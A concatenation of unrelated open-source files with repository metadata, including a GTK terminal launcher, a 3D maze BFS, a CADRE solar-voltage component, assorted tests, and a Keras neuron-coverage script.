        print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
              np.mean(metric_rmse), '\n')

        # one result row per gauge, appended to the running dataframe
        new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
        new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
                          'num_95pcs','corrn', 'rmse']
        df = pd.concat([df, new_df], axis = 0)

        # save df as csv - in case of interruption
        os.chdir(dir_out)
        df.to_csv(tg_name)

    # cd back to dir_in
    os.chdir(dir_in)


# run script
validate()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
aa92cd5b6a1e281f0e443f81d8e6a51fb80d2c9d
|
a89c80dac438747db4dd60e5f9d35c33d9c231bc
|
/bootstrap/legacy/container_0/term.py
|
e44003b63ae8b5c2e4b9c89b9f1c160e69d7eefa
|
[
"MIT"
] |
permissive
|
Trixter9994/lazero
|
09cd13e889421d6567b54aeb5142a7a937b1f35f
|
5a2b7f7499fb11e71885defab130dead7864b9fd
|
refs/heads/master
| 2022-12-17T08:40:14.533371
| 2020-09-22T03:12:04
| 2020-09-22T03:12:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
import gi

# BUG FIX: gi.require_version() must be called BEFORE anything is imported
# from gi.repository; the original imported first, so PyGObject could load
# a default (possibly wrong) typelib version and emit a warning.
gi.require_version('Gtk', '3.0')
gi.require_version('Vte', '2.91')

from gi.repository import Gtk, Vte, GLib, Pango, Gio
class TheWindow(Gtk.Window):
    """Main window: a VTE terminal running /bin/python inside a scrolled box."""

    def __init__(self):
        Gtk.Window.__init__(self, title="GTK3 IDE")
        self.set_default_size(600, 300)

        # Create the terminal widget and attach a fresh pseudo-terminal.
        terminal = Vte.Terminal()
        pty = Vte.Pty.new_sync(Vte.PtyFlags.DEFAULT)
        terminal.set_pty(pty)

        # Spawn an interactive Python interpreter on the pty; `ready`
        # fires once the child process has been created.
        pty.spawn_async(
            None,
            ["/bin/python"],
            None,
            GLib.SpawnFlags.DO_NOT_REAP_CHILD,
            None,
            None,
            -1,
            None,
            self.ready
        )

        # Layout: terminal inside a scrolled window inside a vertical box.
        container = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
        scroller = Gtk.ScrolledWindow()
        scroller.set_hexpand(True)
        scroller.set_vexpand(True)
        scroller.add(terminal)
        container.pack_start(scroller, False, True, 2)
        self.add(container)

    def ready(self, pty, task):
        # Spawn-completion callback; just log the pty for debugging.
        print('pty ', pty)
# Build the window, quit the GTK main loop when it is closed, and show it.
win = TheWindow()
win.connect('destroy', Gtk.main_quit)
win.show_all()
# Enter the GTK event loop; blocks until Gtk.main_quit() runs.
Gtk.main()
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
0bc916255bfd134ba21182595402124b86032802
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_flimflam.py
|
e214907d239173c947b6d0e4fe3c7014e4c32002
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
#calss header
class _FLIMFLAM():
def __init__(self,):
self.name = "FLIMFLAM"
self.definitions = [u'talk that is confusing and intended to deceive']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
2040a05f18652b0a19ade2c74ef5fe69dd3abe92
|
e99d2630e6acd8d2496c77c8ee215f9d82a610b8
|
/tests/test_bazel_workspace.py
|
39b7e0e615eae59d9777ea9d20496be15527d46a
|
[
"Apache-2.0"
] |
permissive
|
useblocks/sphinx-bazel
|
0acbbc13331356a871e5a75ebadee2b2158c4df7
|
38f5403393eb08f651100b21648efe2af6b4b047
|
refs/heads/master
| 2021-08-22T22:31:20.339073
| 2021-06-18T04:53:57
| 2021-06-18T04:53:57
| 171,243,259
| 11
| 4
|
Apache-2.0
| 2021-06-18T04:53:58
| 2019-02-18T08:23:47
|
Python
|
UTF-8
|
Python
| false
| false
| 426
|
py
|
try:
from pathlib import Path
except ImportError:
from pathlib2 import Path
from sphinx_testing import with_app
@with_app(buildername='html', srcdir='doc_test/bazel_workspace') # , warningiserror=True)
def test_bazel_workspace(app, status, warning):
    """Build the bazel_workspace test docs and check that the rendered HTML
    contains the workspace anchor and its description text."""
    app.build()
    html = Path(app.outdir, 'index.html').read_text()
    assert 'workspace-my_workspace_name' in html
    assert 'workspace description' in html
|
[
"daniel.woste@useblocks.com"
] |
daniel.woste@useblocks.com
|
21d83e44ad8d952e8947a946bf94f29b3f270b16
|
de4d88db6ea32d20020c169f734edd4b95c3092d
|
/aiotdlib/api/types/basic_group.py
|
b64635412e5b8db8ca6213e66e871468534ccc6b
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
thiagosm/aiotdlib
|
5cc790a5645f7e4cc61bbd0791433ed182d69062
|
4528fcfca7c5c69b54a878ce6ce60e934a2dcc73
|
refs/heads/main
| 2023-08-15T05:16:28.436803
| 2021-10-18T20:41:27
| 2021-10-18T20:41:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from .chat_member_status import ChatMemberStatus
from ..base_object import BaseObject
class BasicGroup(BaseObject):
    """
    Represents a basic group of 0-200 users (must be upgraded to a supergroup to accommodate more than 200 users)
    
    :param id: Group identifier
    :type id: :class:`int`
    
    :param member_count: Number of members in the group
    :type member_count: :class:`int`
    
    :param status: Status of the current user in the group
    :type status: :class:`ChatMemberStatus`
    
    :param is_active: True, if the group is active
    :type is_active: :class:`bool`
    
    :param upgraded_to_supergroup_id: Identifier of the supergroup to which this group was upgraded; 0 if none
    :type upgraded_to_supergroup_id: :class:`int`
    
    """

    ID: str = Field("basicGroup", alias="@type")
    id: int
    member_count: int
    status: ChatMemberStatus
    is_active: bool
    upgraded_to_supergroup_id: int

    @staticmethod
    def read(q: dict) -> BasicGroup:
        # construct() skips pydantic validation; presumably acceptable
        # because *q* is raw TDLib output (this file is auto-generated).
        return BasicGroup.construct(**q)
|
[
"pylakey@protonmail.com"
] |
pylakey@protonmail.com
|
2bf06aaed7534278af8791becf25639426bcc480
|
cf5f24e5a32f8cafe90d4253d727b1c0457da6a4
|
/algorithm/boj_16985.py
|
a3f12c8374c713064a9eea0eb995f12079fa3a68
|
[] |
no_license
|
seoljeongwoo/learn
|
537659ca942875f6846646c2e21e1e9f2e5b811e
|
5b423e475c8f2bc47cb6dee09b8961d83ab08568
|
refs/heads/main
| 2023-05-04T18:07:27.592058
| 2021-05-05T17:32:50
| 2021-05-05T17:32:50
| 324,725,000
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,164
|
py
|
import sys
from itertools import permutations
from collections import deque
input =sys.stdin.readline
ret = int(1e9)
def range_check(x, y, z):
    """Return True when the coordinate (x, y, z) lies inside the 5x5x5 cube."""
    return all(0 <= coord < 5 for coord in (x, y, z))
def rotate(temp, h):
    """Rotate layer *h* of the 5x5x5 grid *temp* by 90 degrees, in place.

    A rotated copy is built first and then written back element by
    element, so source values are never read after being overwritten.
    Returns *temp* for call chaining.
    """
    layer = temp[h]
    rotated = [[layer[col][4 - row] for col in range(5)] for row in range(5)]
    for row in range(5):
        for col in range(5):
            layer[row][col] = rotated[row][col]
    return temp
def bfs(temp):
    """BFS from (0,0,0) to (4,4,4) through cells equal to 1 in the 5x5x5
    grid *temp*; updates the global best path length `ret`."""
    global ret
    q = deque()
    # Entrance blocked: no path through this arrangement.
    if temp[0][0][0] == 0: return
    q.append((0,0,0))
    # check[x][y][z] is the BFS distance from the start; -1 = unvisited.
    check = [[[-1 for row in range(5)] for col in range(5)] for height in range(5)]
    check[0][0][0] = 0
    while q:
        cx, cy, cz = q.popleft()
        for dx, dy, dz in direction:
            nx,ny,nz = cx+dx, cy+dy, cz+dz
            if range_check(nx, ny, nz) == False : continue
            if check[nx][ny][nz] != -1 or temp[nx][ny][nz] == 0: continue
            check[nx][ny][nz] = check[cx][cy][cz] +1
            # Prune: this arrangement cannot beat the best answer so far.
            if check[nx][ny][nz] >= ret: return
            q.append((nx,ny,nz))
    # Exit never reached.
    if check[4][4][4] == -1: return
    ret = min(ret, check[4][4][4])
    # 12 is the Manhattan distance between opposite corners, hence the
    # smallest possible answer — stop the entire search immediately.
    if ret == 12: print(12); exit(0)
    return
def solve(per):
    """Stack the five plates of the global `board` in the order *per*, then
    try every combination of per-plate rotations (4**5) and BFS each one.

    Best result is accumulated in the global `ret` by bfs().
    """
    global ret
    # Copy the plates into a fresh 5x5x5 working cube in permuted order.
    v = [[[0 for row in range(5)] for col in range(5)] for height in range(5)]
    for index,height in enumerate(per):
        for row in range(5):
            for col in range(5):
                v[index][row][col] = board[height][row][col]
    # Five nested loops enumerate all 4 rotations of each of the 5 plates;
    # rotate() mutates v in place and returns it.
    for i in range(4):
        v = rotate(v,0)
        for j in range(4):
            v = rotate(v,1)
            for k in range(4):
                v = rotate(v,2)
                for l in range(4):
                    v = rotate(v,3)
                    for m in range(4):
                        v = rotate(v,4)
                        bfs(v)
    return
# Read 5 plates of 5x5 cells (1 = passable, 0 = blocked) from stdin.
board = []
# The six axis-aligned unit moves in 3D.
direction = [(0,0,1), (0,0,-1), (1,0,0), (-1,0,0) , (0,1,0) , (0,-1,0)]
for height in range(5):
    floor = []
    for row in range(5):
        floor.append(list(map(int,input().split())))
    board.append(floor)
# Try every ordering of the five plates; solve() also tries all rotations.
for data in list(permutations([i for i in range(5)],5)):
    solve(data)
# int(1e9) is the "unreached" sentinel: report -1 when no path exists.
if ret == int(1e9): ret = -1
print(ret)
|
[
"noreply@github.com"
] |
seoljeongwoo.noreply@github.com
|
c962789a0d7a79b73036d4123cbdfae8ad0b8b3e
|
bfe6c95fa8a2aae3c3998bd59555583fed72900a
|
/reachNumber.py
|
c529cd721779f2e52f7d23adbc52206920abdac0
|
[] |
no_license
|
zzz136454872/leetcode
|
f9534016388a1ba010599f4771c08a55748694b2
|
b5ea6c21bff317884bdb3d7e873aa159b8c30215
|
refs/heads/master
| 2023-09-01T17:26:57.624117
| 2023-08-29T03:18:56
| 2023-08-29T03:18:56
| 240,464,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
class Solution:
    """LeetCode 754: minimum k such that steps ±1, ±2, ..., ±k sum to target."""

    def reachNumber(self, target: int) -> int:
        """Return the fewest steps needed to reach *target* on the number line.

        By symmetry only |target| matters. Take steps 1..k until the
        running sum reaches the goal; flipping the sign of step i changes
        the sum by 2i, so any even surplus can be absorbed. An odd surplus
        needs one or two extra steps to fix the parity.
        """
        goal = abs(target)

        # Smallest k with 1 + 2 + ... + k >= goal.
        steps, total = 0, 0
        while total < goal:
            steps += 1
            total += steps

        surplus = total - goal
        if surplus % 2 == 0:
            return steps

        # Odd surplus: taking step k+1 (and possibly k+2) makes it even.
        steps += 1
        if (steps - surplus) % 2 != 0:
            steps += 1
        return steps
# Quick manual check of the solution for target = 2.
target = 2
print(Solution().reachNumber(target))
|
[
"zzz136454872@163.com"
] |
zzz136454872@163.com
|
5e24b2565a618ba55d6cd3076b1e53d6d810773b
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02615/s526468670.py
|
459df95840e8558c1521ce47d258b9055f356cf3
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
# Read n values, sort descending; count the largest once, then each
# subsequent value is used for (at most) two of the remaining n-2 slots.
n = int(input())
values = sorted(map(int, input().split()), reverse=True)

total = values[0]
for slot in range(n - 2):
    total += values[1 + slot // 2]
print(total)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
58d5dca55a3bf9e020bcac0e1af8db7b09471366
|
2f64dddf0d5df9df42b1c93d8f946c788d19fef0
|
/scruffy/env.py
|
d760d1cfc7f78a3af7918160f96c5a9756ae2065
|
[] |
no_license
|
tmr232/scruffy
|
41d2598d0b15b8eefd8ab038b1411eb8c384b836
|
3c35369a5a7b67e934d59c321439e3d3e5495970
|
refs/heads/master
| 2021-01-17T14:18:58.418097
| 2015-02-26T11:52:25
| 2015-02-26T11:52:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,835
|
py
|
import os
import yaml
import itertools
import errno
import logging
import logging.config
from .directory import Directory
from .plugin import PluginManager
from .config import ConfigNode, Config, ConfigEnv, ConfigApplicator
class Environment(object):
    """
    An environment in which to run a program.

    Bundles a set of named children (directories, configs, plugins),
    loads the first Config it can find among them, and configures
    logging from it. Children are reachable both as attributes
    (env.logs) and by subscript (env['logs']).
    """

    def __init__(self, setup_logging=True, *args, **kwargs):
        self._pm = PluginManager()
        self._children = {}
        self.config = None

        # find a config if we have one and load it
        self.config = self.find_config(kwargs)
        if self.config:
            self.config.load()

        # setup logging
        if setup_logging:
            if self.config is not None and self.config.logging.dict_config is not None:
                # configure logging from the configuration
                logging.config.dictConfig(self.config.logging.dict_config.to_dict())
            else:
                # no dict config, set up a basic config so we at least get
                # messages logged to stdout
                log = logging.getLogger()
                log.setLevel(logging.INFO)
                if not any(isinstance(h, logging.StreamHandler) for h in log.handlers):
                    log.addHandler(logging.StreamHandler())

        # add children
        self.add(**kwargs)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.cleanup()

    def __getitem__(self, key):
        return self._children[key]

    def __getattr__(self, key):
        # Fall back to the child registry for unknown attribute names so
        # env.logs behaves like env['logs'].
        # NOTE(review): this raises KeyError (not AttributeError) for
        # missing names, which can confuse hasattr()/copy — confirm ok.
        return self._children[key]

    def find_config(self, children):
        """
        Find a config in our children so we can fill in variables in our
        other children with its data.

        A kwarg literally named 'config' wins over any other Config
        instance found; Directory children are also searched for nested
        configs.
        """
        named_config = None
        found_config = None

        # first see if we got a kwarg named 'config', as this guy is special
        if 'config' in children:
            if isinstance(children['config'], str):
                # NOTE(review): ConfigFile is not imported in this module,
                # so this branch raises NameError as written — confirm it
                # should come from .config.
                children['config'] = ConfigFile(children['config'])
            elif isinstance(children['config'], Config):
                children['config'] = children['config']
            elif isinstance(children['config'], dict):
                children['config'] = Config(data=children['config'])
            else:
                raise TypeError("Don't know how to turn {} into a Config".format(type(children['config'])))
            named_config = children['config']

        # next check the other kwargs
        for k in children:
            if isinstance(children[k], Config):
                found_config = children[k]

        # if we still don't have a config, see if there's a directory with one
        for k in children:
            if isinstance(children[k], Directory):
                for j in children[k]._children:
                    if j == 'config' and not named_config:
                        named_config = children[k]._children[j]
                    if isinstance(children[k]._children[j], Config):
                        found_config = children[k]._children[j]

        return named_config if named_config else found_config

    def add(self, **kwargs):
        """
        Add objects to the environment.

        Strings are interpreted as directory paths; anything else is
        stored as-is. Each child gets a back-reference to this
        environment, has config variables applied, and is prepared.
        """
        for key in kwargs:
            if isinstance(kwargs[key], str):
                self._children[key] = Directory(kwargs[key])
            else:
                self._children[key] = kwargs[key]
            self._children[key]._env = self
            self._children[key].apply_config(ConfigApplicator(self.config))
            self._children[key].prepare()

    def cleanup(self):
        """
        Clean up the environment by cleaning up every child.
        """
        for key in self._children:
            self._children[key].cleanup()

    @property
    def plugins(self):
        # Plugins are owned by the PluginManager, not the child registry.
        return self._pm.plugins
|
[
"snare@ho.ax"
] |
snare@ho.ax
|
8e6ddac527a835923457ffb56b86e80403bcc21e
|
c672675d505f1b0dafb4b81141644caedf24cdef
|
/CADRE/power_dymos/power_cell_voltage.py
|
1190bedce22ea57736456b93baa146f986dc045b
|
[
"Apache-2.0"
] |
permissive
|
johnjasa/CADRE
|
aa63c7fa9466dc1839b454f2484346e57204dc8a
|
a4ffd61582b8474953fc309aa540838a14f29dcf
|
refs/heads/master
| 2020-04-07T03:19:57.501186
| 2018-11-17T19:15:10
| 2018-11-17T19:15:10
| 158,012,106
| 0
| 0
|
Apache-2.0
| 2018-11-17T18:17:53
| 2018-11-17T18:17:53
| null |
UTF-8
|
Python
| false
| false
| 4,874
|
py
|
"""
Power discipline for CADRE: Power Cell Voltage component.
"""
from __future__ import print_function, division, absolute_import
from six.moves import range
import os
import numpy as np
from openmdao.api import ExplicitComponent
from MBI import MBI
class PowerCellVoltage(ExplicitComponent):
"""
Compute the output voltage of the solar panels.
"""
def initialize(self):
fpath = os.path.dirname(os.path.realpath(__file__))
self.options.declare('num_nodes', types=(int, ),
desc="Number of time points.")
self.options.declare('filename', fpath + '/../data/Power/curve.dat',
desc="File containing surrogate model for voltage.")
def setup(self):
nn = self.options['num_nodes']
filename = self.options['filename']
dat = np.genfromtxt(filename)
nT, nA, nI = dat[:3]
nT = int(nT)
nA = int(nA)
nI = int(nI)
T = dat[3:3 + nT]
A = dat[3 + nT:3 + nT + nA]
I = dat[3 + nT + nA:3 + nT + nA + nI] # noqa: E741
V = dat[3 + nT + nA + nI:].reshape((nT, nA, nI), order='F')
self.MBI = MBI(V, [T, A, I], [6, 6, 15], [3, 3, 3])
self.x = np.zeros((84 * nn, 3), order='F')
self.xV = self.x.reshape((nn, 7, 12, 3), order='F')
# Inputs
self.add_input('LOS', np.zeros((nn, )), units=None,
desc='Line of Sight over Time')
self.add_input('temperature', np.zeros((nn, 5)), units='degK',
desc='Temperature of solar cells over time')
self.add_input('exposed_area', np.zeros((nn, 7, 12)), units='m**2',
desc='Exposed area to sun for each solar cell over time')
self.add_input('Isetpt', np.zeros((nn, 12)), units='A',
desc='Currents of the solar panels')
# Outputs
self.add_output('V_sol', np.zeros((nn, 12)), units='V',
desc='Output voltage of solar panel over time')
rows = np.arange(nn*12)
cols = np.tile(np.repeat(0, 12), nn) + np.repeat(np.arange(nn), 12)
self.declare_partials('V_sol', 'LOS', rows=rows, cols=cols)
row = np.tile(np.repeat(0, 5), 12) + np.repeat(np.arange(12), 5)
rows = np.tile(row, nn) + np.repeat(12*np.arange(nn), 60)
col = np.tile(np.arange(5), 12)
cols = np.tile(col, nn) + np.repeat(5*np.arange(nn), 60)
self.declare_partials('V_sol', 'temperature', rows=rows, cols=cols)
row = np.tile(np.arange(12), 7)
rows = np.tile(row, nn) + np.repeat(12*np.arange(nn), 84)
cols = np.arange(nn*7*12)
self.declare_partials('V_sol', 'exposed_area', rows=rows, cols=cols)
row_col = np.arange(nn*12)
self.declare_partials('V_sol', 'Isetpt', rows=row_col, cols=row_col)
def setx(self, inputs):
temperature = inputs['temperature']
LOS = inputs['LOS']
exposed_area = inputs['exposed_area']
Isetpt = inputs['Isetpt']
for p in range(12):
i = 4 if p < 4 else (p % 4)
for c in range(7):
self.xV[:, c, p, 0] = temperature[:, i]
self.xV[:, c, p, 1] = LOS * exposed_area[:, c, p]
self.xV[:, c, p, 2] = Isetpt[:, p]
def compute(self, inputs, outputs):
"""
Calculate outputs.
"""
nn = self.options['num_nodes']
self.setx(inputs)
self.raw = self.MBI.evaluate(self.x)[:, 0].reshape((nn, 7, 12), order='F')
outputs['V_sol'] = np.zeros((nn, 12))
for c in range(7):
outputs['V_sol'] += self.raw[:, c, :]
def compute_partials(self, inputs, partials):
    """
    Calculate and save derivatives. (i.e., Jacobian)

    Uses the MBI surrogate's first derivatives with respect to its three
    inputs (temperature, LOS*area illumination, current) and the chain
    rule to fill the declared sparse partials.
    """
    nn = self.options['num_nodes']
    exposed_area = inputs['exposed_area']
    LOS = inputs['LOS']

    # d(raw)/d(temperature), d(raw)/d(LOS*area), d(raw)/d(current).
    raw1 = self.MBI.evaluate(self.x, 1)[:, 0].reshape((nn, 7, 12), order='F')
    raw2 = self.MBI.evaluate(self.x, 2)[:, 0].reshape((nn, 7, 12), order='F')
    raw3 = self.MBI.evaluate(self.x, 3)[:, 0].reshape((nn, 7, 12), order='F')

    # Bug fix: all four buffers are accumulated with += below, so they must
    # start at zero.  dV_dL and dV_dI were created with np.empty and
    # therefore accumulated on top of uninitialized memory.
    dV_dL = np.zeros((nn, 12))
    dV_dT = np.zeros((nn, 12, 5))
    dV_dA = np.zeros((nn, 7, 12))
    dV_dI = np.zeros((nn, 12))

    for p in range(12):
        # Panels 0-3 read temperature channel 4; panels 4-11 map to 0-3.
        i = 4 if p < 4 else (p % 4)
        for c in range(7):
            # x[..., 1] = LOS * exposed_area, hence the chain-rule factors.
            dV_dL[:, p] += raw2[:, c, p] * exposed_area[:, c, p]
            dV_dT[:, p, i] += raw1[:, c, p]
            dV_dA[:, c, p] += raw2[:, c, p] * LOS
            dV_dI[:, p] += raw3[:, c, p]

    partials['V_sol', 'LOS'] = dV_dL.flatten()
    partials['V_sol', 'temperature'] = dV_dT.flatten()
    partials['V_sol', 'exposed_area'] = dV_dA.flatten()
    partials['V_sol', 'Isetpt'] = dV_dI.flatten()
|
[
"kenneth.t.moore-1@nasa.gov"
] |
kenneth.t.moore-1@nasa.gov
|
950676821e3247a2de1ac3ab907345178473721e
|
69bfed466017c654c5d24a3e735430c4dc138af4
|
/src/settings.py
|
fc9c4e70c37f0bca34b88ed0a4c3fc0d16a4d2e2
|
[
"MIT"
] |
permissive
|
kartagis/lucy
|
20579fe1776cb6a2cfda2c26212d3d63be8829be
|
45de24c0b01dfb9329eb31a1bd705df5b26e84a3
|
refs/heads/master
| 2021-01-23T15:27:20.420914
| 2017-09-07T08:08:14
| 2017-09-07T08:08:14
| 102,708,901
| 0
| 0
| null | 2017-09-07T08:00:34
| 2017-09-07T08:00:34
| null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base

# Default SQLite database location, relative to the working directory.
db_name = "db/filop.db"
Base = declarative_base()


def session(db_name=db_name):
    """Create the schema if needed and return a new SQLAlchemy session.

    The module-level ``db_name`` is captured as the default at import time.
    """
    engine = create_engine('sqlite:///{}'.format(db_name))
    factory = sessionmaker(bind=engine)
    Base.metadata.create_all(engine)
    return factory()
|
[
"hakancelik96@outlook.com"
] |
hakancelik96@outlook.com
|
ddfa181471cceb2fcfaedc2db33679d4f3c3ae67
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/renderer/core/url_pattern/DEPS
|
7c671850403fe157f8234a4a1b325f2ab5b091ee
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 277
|
# Copyright 2020 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
include_rules = [
"+base/strings/string_util.h",
"+third_party/liburlpattern",
"+url/url_canon.h",
"+url/url_util.h",
]
|
[
"chromium-scoped@luci-project-accounts.iam.gserviceaccount.com"
] |
chromium-scoped@luci-project-accounts.iam.gserviceaccount.com
|
|
e45f74a36ee23641f9d7cd1fdf8a4ba8f9a3e067
|
af3ec207381de315f4cb6dddba727d16d42d6c57
|
/dialogue-engine/test/programytest/processors/post/test_mergechinese.py
|
94679d64e47a6074fb113389ea20ae7e01be2ae1
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mcf-yuichi/cotoba-agent-oss
|
02a5554fe81ce21517f33229101013b6487f5404
|
ce60833915f484c4cbdc54b4b8222d64be4b6c0d
|
refs/heads/master
| 2023-01-12T20:07:34.364188
| 2020-11-11T00:55:16
| 2020-11-11T00:55:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,284
|
py
|
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.processors.post.mergechinese import MergeChinesePostProcessor
from programy.context import ClientContext
from programytest.client import TestClient
class MergeChineseTests(unittest.TestCase):

    def test_merge_chinese(self):
        """Adjacent Chinese characters are merged; other text is untouched."""
        processor = MergeChinesePostProcessor()
        context = ClientContext(TestClient(), "testid")

        cases = [
            ("Hello", "Hello"),
            ("Hello World", "Hello World"),
            ("你 好", "你好"),
            ("问 你 好", "问你好"),
            ("XX 你 好", "XX 你好"),
            ("XX 你 好 YY", "XX 你好 YY"),
        ]
        for text, expected in cases:
            result = processor.process(context, text)
            self.assertIsNotNone(result)
            self.assertEqual(expected, result)
|
[
"cliff@cotobadesign.com"
] |
cliff@cotobadesign.com
|
64b15f566dc2e930a5e0177cd01827d2c16d2e5e
|
59bd639757fd8afcfdba73298a69482fd1f88069
|
/cifar10/7_DenseNet/4last-output.py
|
95b854521d8ef455b564b73ffa226914c451d537
|
[] |
no_license
|
DeepReduce/DeepReduce
|
f1e14b985affba2796c80d9e795b36cfd4ed9a55
|
707c2b411d65ed77967a3d1ea1506a91cc9d4bfd
|
refs/heads/master
| 2020-08-01T01:47:23.293453
| 2020-06-14T18:09:01
| 2020-06-14T18:09:01
| 210,813,368
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,670
|
py
|
import keras
from keras import optimizers
from keras.datasets import cifar10
from keras.models import Sequential
from keras.layers import Conv2D, Dense, Flatten, MaxPooling2D
from keras.callbacks import LearningRateScheduler, TensorBoard
from keras.models import load_model
from collections import defaultdict
import numpy as np
def init_dict(model, model_layer_dict):
    """Register every tracked neuron as uncovered (False).

    Keys are (layer_name, neuron_index); flatten and input layers are skipped.
    """
    tracked = (layer for layer in model.layers
               if 'flatten' not in layer.name and 'input' not in layer.name)
    for layer in tracked:
        for neuron_idx in range(layer.output_shape[-1]):
            model_layer_dict[(layer.name, neuron_idx)] = False
def update_coverage(input_data, model, model_layer_dict, threshold=0.2):
    """Mark neurons whose scaled mean activation exceeds ``threshold``.

    Runs ``input_data`` through every non-flatten/non-input layer and flips
    the corresponding (layer_name, index) coverage entry to True.

    NOTE(review): relies on ``Model`` being imported later in this module
    before the first call -- confirm import order if this starts failing.
    """
    layer_names = [layer.name for layer in model.layers if
                   'flatten' not in layer.name and 'input' not in layer.name]

    intermediate_layer_model = Model(inputs=model.input,
                                     outputs=[model.get_layer(layer_name).output for layer_name in layer_names])
    intermediate_layer_outputs = intermediate_layer_model.predict(input_data)
    for i, intermediate_layer_output in enumerate(intermediate_layer_outputs):
        scaled = scale(intermediate_layer_output[0])
        # Bug fix: `xrange` is Python 2 only and raised NameError here; the
        # rest of this file uses Python 3 print() calls.
        for num_neuron in range(scaled.shape[-1]):
            if np.mean(scaled[..., num_neuron]) > threshold and not model_layer_dict[(layer_names[i], num_neuron)]:
                model_layer_dict[(layer_names[i], num_neuron)] = True
def neuron_covered(model_layer_dict):
    """Return (covered, total, coverage_ratio) over the tracked neurons."""
    total = len(model_layer_dict)
    covered = sum(1 for hit in model_layer_dict.values() if hit)
    return covered, total, covered / float(total)
def scale(intermediate_layer_output, rmax=1, rmin=0):
    """Min-max normalise an activation array into the [rmin, rmax] range."""
    lo = intermediate_layer_output.min()
    hi = intermediate_layer_output.max()
    # Same arithmetic as the classic (x - min)/(max - min) rescaling;
    # a constant array still yields NaN (division by zero), as before.
    unit = (intermediate_layer_output - lo) / (hi - lo)
    return unit * (rmax - rmin) + rmin
def color_preprocessing(x_train, x_test):
    """Cast both splits to float32 and subtract fixed per-channel means.

    No std scaling is applied (the commented-out values in the original
    were an earlier experiment).
    """
    x_train = x_train.astype('float32')
    x_test = x_test.astype('float32')
    mean = [123.680, 116.779, 103.939]
    for channel, channel_mean in enumerate(mean):
        x_train[:, :, :, channel] -= channel_mean
        x_test[:, :, :, channel] -= channel_mean
    return x_train, x_test
